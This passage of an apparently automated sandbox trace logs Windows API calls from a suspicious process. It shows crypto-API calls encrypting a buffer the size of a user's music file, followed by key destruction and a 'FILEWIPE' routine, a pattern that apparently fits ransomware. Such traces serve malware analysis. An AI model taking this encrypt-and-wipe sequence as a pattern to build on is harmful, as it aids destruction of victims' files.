hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.658] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.659] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.659] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.659] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95c108*, pdwDataLen=0x6ae220*=0x13874, dwBufLen=0x13880 | out: pbData=0x95c108*, pdwDataLen=0x6ae220*=0x13880) returned 1 [0038.659] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.659] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.659] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.660] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.660] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.660] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.660] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.660] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.660] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.660] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.660] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.660] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.660] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.660] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0038.661] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.668] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.668] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.668] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.670] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.670] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.670] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.670] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.670] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0038.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.670] CryptDestroyKey (hKey=0x7c2200) returned 1 [0038.671] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.671] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.671] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.671] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.671] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.671] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.671] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.671] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.671] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.671] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0038.671] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.671] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.671] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.671] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.671] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.672] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.672] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.672] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.672] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.672] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.672] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.672] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.672] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.672] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.672] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.672] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.673] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0038.673] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.673] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.673] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0038.673] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.673] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.673] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.675] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.676] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.676] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.676] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0038.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.676] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.676] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.676] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5efa240, ftCreationTime.dwHighDateTime=0x1d5bf9d, ftLastAccessTime.dwLowDateTime=0x54f4ee0, ftLastAccessTime.dwHighDateTime=0x1d5be37, ftLastWriteTime.dwLowDateTime=0x54f4ee0, ftLastWriteTime.dwHighDateTime=0x1d5be37, nFileSizeHigh=0x0, nFileSizeLow=0x13874, dwReserved0=0x0, dwReserved1=0x777648, cFileName="XajMo5BmFRMN.mp3", cAlternateFileName="XAJMO5~1.MP3")) returned 0x7c2100 [0038.676] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.676] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.677] CharLowerBuffW (in: lpsz="byte[79988]", cchLength=0xb | out: lpsz="byte[79988]") returned 0xb [0038.677] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.677] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.677] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.677] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.677] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.677] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.678] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.679] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.679] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.679] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.680] PeekMessageW (in: lpMsg=0x6ae83c, 